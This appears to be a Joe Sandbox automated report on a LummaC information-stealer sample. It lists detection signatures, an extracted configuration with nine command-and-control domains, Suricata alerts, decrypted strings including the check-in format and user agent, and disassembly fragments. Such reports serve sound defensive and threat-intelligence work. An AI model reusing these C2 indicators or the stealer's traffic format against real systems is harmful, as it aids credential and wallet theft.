Edit tour

Windows Analysis Report
Rgr8LJz.exe

Overview

General Information

Sample name:	Rgr8LJz.exe
Analysis ID:	1585913
MD5:	20155323669fd610a0c7201be666fbd6
SHA1:	99bb4dcee2ba86b0f6220ecbefffd1700e44ba71
SHA256:	586b3a854631ed30c8aefbde7edcf3a725d7c40a4a56c8ebc17aeb64979ea442
Tags:	exemalwaretrojanuser-Joker
Infos:

Detection

LummaC

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for URL or domain

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected LummaC Stealer

AI detected suspicious sample

C2 URLs / IPs found in malware configuration

Contains functionality to inject code into remote processes

Found many strings related to Crypto-Wallets (likely being stolen)

Injects a PE file into a foreign processes

LummaC encrypted strings found

Machine Learning detection for sample

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Query firmware table information (likely to detect VMs)

Sample uses string decryption to hide its real strings

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Crypto Currency Wallets

AV process strings found (often used to terminate AV products)

Allocates memory with a write watch (potentially for evading sandboxes)

Binary contains a suspicious time stamp

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to modify clipboard data

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to record screenshots

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found inlined nop instructions (likely shell or obfuscated code)

Found potential string decryption / allocating functions

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

One or more processes crash

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Searches for user specific document files

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

System is w10x64

Rgr8LJz.exe (PID: 7276 cmdline: "C:\Users\user\Desktop\Rgr8LJz.exe" MD5: 20155323669FD610A0C7201BE666FBD6)

conhost.exe (PID: 7284 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

Rgr8LJz.exe (PID: 7344 cmdline: "C:\Users\user\Desktop\Rgr8LJz.exe" MD5: 20155323669FD610A0C7201BE666FBD6)

Rgr8LJz.exe (PID: 7352 cmdline: "C:\Users\user\Desktop\Rgr8LJz.exe" MD5: 20155323669FD610A0C7201BE666FBD6)

WerFault.exe (PID: 7444 cmdline: C:\Windows\SysWOW64\WerFault.exe -u -p 7276 -s 924 MD5: C31336C1EFC2CCB44B4326EA793040F2)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Lumma Stealer, LummaC2 Stealer	Lumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.	No Attribution	https://0xmrmagnezi.github.io/malware%20analysis/LummaStealer/ https://0xtoxin-labs.gitbook.io/malware-analysis/malware-analysis/lummac2-breakdown#chrome-extensions-crx https://any.run/cybersecurity-blog/crackedcantil-breakdown/ https://blog.cyble.com/2023/01/06/lummac2-stealer-a-potent-threat-to-crypto-users/ https://blog.sekoia.io/exposing-fakebat-loader-distribution-methods-and-adversary-infrastructure/	https://malpedia.caad.fkie.fraunhofer.de/details/win.lumma

Malware Configuration

Threatname: LummaC

{"C2 url": ["versersleep.shop", "crowdwarek.shop", "apporholis.shop", "cureprouderio.click", "handscreamny.shop", "femalsabler.shop", "soundtappysk.shop", "robinsharez.shop", "chipdonkeruz.shop"], "Build id": "LPnhqo--nbgnxdlxdnyo"}

Yara Signatures

PCAP (Network Traffic)

Source	Rule	Description	Author	Strings
sslproxydump.pcap	JoeSecurity_LummaCStealer_3	Yara detected LummaC Stealer	Joe Security
sslproxydump.pcap	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
00000003.00000002.2890355169.0000000000400000.00000040.00000400.00020000.00000000.sdmp	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
Process Memory Space: Rgr8LJz.exe PID: 7352	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security
decrypted.memstr	JoeSecurity_LummaCStealer_2	Yara detected LummaC Stealer	Joe Security

Unpacked PEs

Source	Rule	Description	Author
3.2.Rgr8LJz.exe.400000.0.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
3.2.Rgr8LJz.exe.400000.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security
0.2.Rgr8LJz.exe.4089550.0.raw.unpack	JoeSecurity_LummaCStealer_4	Yara detected LummaC Stealer	Joe Security

Suricata Signatures

ET JA3 Hash - Possible Malware - Fake Firefox Font Update

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T13:57:56.472148+0100	2028371	3	Unknown Traffic	192.168.2.4	49730	104.21.4.114	443	TCP
2025-01-08T13:57:57.426089+0100	2028371	3	Unknown Traffic	192.168.2.4	49732	104.21.4.114	443	TCP
2025-01-08T13:57:58.747803+0100	2028371	3	Unknown Traffic	192.168.2.4	49734	104.21.4.114	443	TCP
2025-01-08T13:57:59.912318+0100	2028371	3	Unknown Traffic	192.168.2.4	49738	104.21.4.114	443	TCP
2025-01-08T13:58:00.976526+0100	2028371	3	Unknown Traffic	192.168.2.4	49739	104.21.4.114	443	TCP
2025-01-08T13:58:02.524982+0100	2028371	3	Unknown Traffic	192.168.2.4	49741	104.21.4.114	443	TCP
2025-01-08T13:58:03.833728+0100	2028371	3	Unknown Traffic	192.168.2.4	49742	104.21.4.114	443	TCP
2025-01-08T13:58:13.622738+0100	2028371	3	Unknown Traffic	192.168.2.4	49748	104.21.4.114	443	TCP

ET MALWARE Lumma Stealer CnC Host Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T13:57:56.941881+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49730	104.21.4.114	443	TCP
2025-01-08T13:57:57.967721+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49732	104.21.4.114	443	TCP
2025-01-08T13:58:14.109483+0100	2054653	1	A Network Trojan was detected	192.168.2.4	49748	104.21.4.114	443	TCP

ET MALWARE Lumma Stealer Related Activity

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T13:57:56.941881+0100	2049836	1	A Network Trojan was detected	192.168.2.4	49730	104.21.4.114	443	TCP

ET MALWARE Lumma Stealer Related Activity M2

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T13:57:57.967721+0100	2049812	1	A Network Trojan was detected	192.168.2.4	49732	104.21.4.114	443	TCP

ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T13:57:56.472148+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	49730	104.21.4.114	443	TCP
2025-01-08T13:57:57.426089+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	49732	104.21.4.114	443	TCP
2025-01-08T13:57:58.747803+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	49734	104.21.4.114	443	TCP
2025-01-08T13:57:59.912318+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	49738	104.21.4.114	443	TCP
2025-01-08T13:58:00.976526+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	49739	104.21.4.114	443	TCP
2025-01-08T13:58:02.524982+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	49741	104.21.4.114	443	TCP
2025-01-08T13:58:03.833728+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	49742	104.21.4.114	443	TCP
2025-01-08T13:58:13.622738+0100	2058639	1	Domain Observed Used for C2 Detected	192.168.2.4	49748	104.21.4.114	443	TCP

ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cureprouderio .click)

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T13:57:55.981472+0100	2058638	1	Domain Observed Used for C2 Detected	192.168.2.4	64606	1.1.1.1	53	UDP

ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-08T13:58:02.997634+0100	2048094	1	Malware Command and Control Activity Detected	192.168.2.4	49741	104.21.4.114	443	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for URL or domain

Source: https://cureprouderio.click/api:M	Avira URL Cloud: Label: malware
Source: cureprouderio.click	Avira URL Cloud: Label: malware
Source: robinsharez.shop	Avira URL Cloud: Label: malware
Source: versersleep.shop	Avira URL Cloud: Label: malware
Source: chipdonkeruz.shop	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click:443/apiefault-release/key4.dbPK	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click/buPs	Avira URL Cloud: Label: malware
Source: femalsabler.shop	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click/api	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click:443/api	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click/apil	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click:443/apiL	Avira URL Cloud: Label: malware
Source: soundtappysk.shop	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click/	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click:443/api4	Avira URL Cloud: Label: malware
Source: crowdwarek.shop	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click:443/apin	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click/=s	Avira URL Cloud: Label: malware
Source: handscreamny.shop	Avira URL Cloud: Label: malware
Source: apporholis.shop	Avira URL Cloud: Label: malware
Source: https://cureprouderio.click/pi	Avira URL Cloud: Label: malware

Found malware configuration

Source: 3.2.Rgr8LJz.exe.400000.0.unpack

Malware Configuration Extractor: LummaC {"C2 url": ["versersleep.shop", "crowdwarek.shop", "apporholis.shop", "cureprouderio.click", "handscreamny.shop", "femalsabler.shop", "soundtappysk.shop", "robinsharez.shop", "chipdonkeruz.shop"], "Build id": "LPnhqo--nbgnxdlxdnyo"}

Multi AV Scanner detection for submitted file

Source: Rgr8LJz.exe	Virustotal: Detection: 49%			Perma Link
Source: Rgr8LJz.exe	ReversingLabs: Detection: 47%

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 96.8% probability

Machine Learning detection for sample

Source: Rgr8LJz.exe

Joe Sandbox ML: detected

Sample uses string decryption to hide its real strings

Source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: robinsharez.shop
Source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: handscreamny.shop
Source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: chipdonkeruz.shop
Source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: versersleep.shop
Source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: crowdwarek.shop
Source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: apporholis.shop
Source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: femalsabler.shop
Source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: soundtappysk.shop
Source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: cureprouderio.click
Source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: lid=%s&j=%s&ver=4.0
Source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: TeslaBrowser/5.5
Source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Screen Resoluton:
Source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: - Physical Installed Memory:
Source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: Workgroup: -
Source: 00000000.00000002.1810621021.0000000004089000.00000004.00000800.00020000.00000000.sdmp	String decryptor: LPnhqo--nbgnxdlxdnyo

Source: C:\Users\user\Desktop\Rgr8LJz.exe

Code function: 3_2_00418BDB CryptUnprotectData,

3_2_00418BDB

Source: Rgr8LJz.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: unknown	HTTPS traffic detected: 104.21.4.114:443 -> 192.168.2.4:49730 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.114:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.114:443 -> 192.168.2.4:49734 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.114:443 -> 192.168.2.4:49738 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.114:443 -> 192.168.2.4:49739 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.114:443 -> 192.168.2.4:49741 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.114:443 -> 192.168.2.4:49742 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 104.21.4.114:443 -> 192.168.2.4:49748 version: TLS 1.2

Source: Rgr8LJz.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: System.Windows.Forms.pdb source: WER9626.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb source: WER9626.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WER9626.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WER9626.tmp.dmp.6.dr
Source:	Binary string: Handler.pdb source: Rgr8LJz.exe, WER9626.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER9626.tmp.dmp.6.dr
Source:	Binary string: System.pdbMZ source: WER9626.tmp.dmp.6.dr
Source:	Binary string: Handler.pdbL0 source: WER9626.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdb source: WER9626.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WER9626.tmp.dmp.6.dr

Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx edi, byte ptr [esp+ecx-2236520Bh]	3_2_00428970
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov word ptr [ecx], dx	3_2_00442191
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+56h]	3_2_00418BDB
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx edx, byte ptr [esi+eax-000000A1h]	3_2_00442842
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then cmp dword ptr [esi+edx*8], 53585096h	3_2_0042B031
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_004150D0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ecx+34h]	3_2_0040C8DE
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx edx, byte ptr [esp+ebx+01h]	3_2_0042A8E0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then jmp eax	3_2_0043D8F0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movsx eax, byte ptr [esi+ecx]	3_2_0041F8A0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov dword ptr [esp+0000009Ch], 00000000h	3_2_004190A6
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0041C0AD
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov byte ptr [eax], cl	3_2_0041C0AD
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-5FD8ABE8h]	3_2_00421150
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then cmp word ptr [edx+ecx+02h], 0000h	3_2_00421150
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax]	3_2_0041F9F0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0042A9F4
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+04h]	3_2_00409270
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov byte ptr [edx], al	3_2_00409270
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov ebx, eax	3_2_00405AD0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov ebp, eax	3_2_00405AD0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+1259B075h]	3_2_004222F0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+ebx+18C14F5Ch]	3_2_004302A2
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx esi, word ptr [ecx]	3_2_0043E2B9
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx ebx, byte ptr [esp+edx-45h]	3_2_0043E2B9
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov ecx, eax	3_2_00419B6F
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then push esi	3_2_00417303
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx edi, byte ptr [esi]	3_2_0040AB10
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov word ptr [ecx], dx	3_2_00442335
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_00415BD0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000164h]	3_2_0042F3E7
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax+00000164h]	3_2_0042F3EA
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-03h]	3_2_00427BA0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then push ebx	3_2_0043DBB0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov edx, ebx	3_2_0043DBB0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax-7100F2B0h]	3_2_004403B0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax+77DC32E0h]	3_2_0044144E
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then lea eax, dword ptr [eax+eax*4]	3_2_00408470
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then add ebp, dword ptr [esp+0Ch]	3_2_0042E400
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx edx, byte ptr [esp+eax-23h]	3_2_00428CD0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042FD51
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0041CD60
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov byte ptr [edi], al	3_2_0042FD4F
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+261E7177h]	3_2_0040BD34
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov word ptr [esi], ax	3_2_0040BD34
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov ecx, eax	3_2_00408DC0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then jmp eax	3_2_00442DC5
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov eax, edi	3_2_0041D5D0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx edx, word ptr [esp+eax*4+00001118h]	3_2_00407650
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx eax, byte ptr [esp+edx+30h]	3_2_0041667E
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_00430E0C
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov ecx, eax	3_2_00430613
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_00430E1E
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx esi, byte ptr [esp+eax-0000008Fh]	3_2_0041C620
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx edx, byte ptr [esp+edi-31F6A1F2h]	3_2_0041C620
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0041C620
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov word ptr [esi], cx	3_2_0041C620
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov byte ptr [edi], cl	3_2_0042FEC3
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov ebx, dword ptr [edi+04h]	3_2_0042C6C0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then jmp eax	3_2_00427ED0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then cmp dword ptr [esi+edi*8], 6A911B6Ch	3_2_004176DC
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov word ptr [eax], cx	3_2_0042AE86
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov word ptr [edi], cx	3_2_0042AE86
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then cmp byte ptr [esi+ebx], 00000000h	3_2_0042DEA0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov ebx, eax	3_2_0042DEA0
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then cmp dword ptr [edi+esi*8], 01FCE602h	3_2_00440740
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov ecx, eax	3_2_0041775C
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx ebx, byte ptr [edx]	3_2_00439F60
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+eax+6Ch]	3_2_00409720
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx esi, byte ptr [esp+edx+06FEAB43h]	3_2_0041972E
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then mov byte ptr [eax], cl	3_2_0041972E
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx esi, byte ptr [esp+ecx+50h]	3_2_00428F9D
Source: C:\Users\user\Desktop\Rgr8LJz.exe	Code function: 4x nop then movzx ecx, byte ptr [esp+edx+30h]	3_2_004407B0

Networking

Suricata IDS alerts for network traffic

Source: Network traffic	Suricata IDS: 2058638 - Severity 1 - ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cureprouderio .click) : 192.168.2.4:64606 -> 1.1.1.1:53
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49732 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49738 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49730 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49739 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49734 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49742 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49748 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2058639 - Severity 1 - ET MALWARE Observed Win32/Lumma Stealer Related Domain (cureprouderio .click in TLS SNI) : 192.168.2.4:49741 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2049812 - Severity 1 - ET MALWARE Lumma Stealer Related Activity M2 : 192.168.2.4:49732 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49732 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2048094 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration : 192.168.2.4:49741 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.4:49730 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49730 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.4:49748 -> 104.21.4.114:443

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor	URLs: versersleep.shop
Source: Malware configuration extractor	URLs: crowdwarek.shop
Source: Malware configuration extractor	URLs: apporholis.shop
Source: Malware configuration extractor	URLs: cureprouderio.click
Source: Malware configuration extractor	URLs: handscreamny.shop
Source: Malware configuration extractor	URLs: femalsabler.shop
Source: Malware configuration extractor	URLs: soundtappysk.shop
Source: Malware configuration extractor	URLs: robinsharez.shop
Source: Malware configuration extractor	URLs: chipdonkeruz.shop

Source: Joe Sandbox View

ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS

Source: Joe Sandbox View

JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1

Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49732 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49730 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49739 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49734 -> 104.21.4.114:443
Source: Network traffic	Suricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.4:49742 -> 104.21.4.114:443
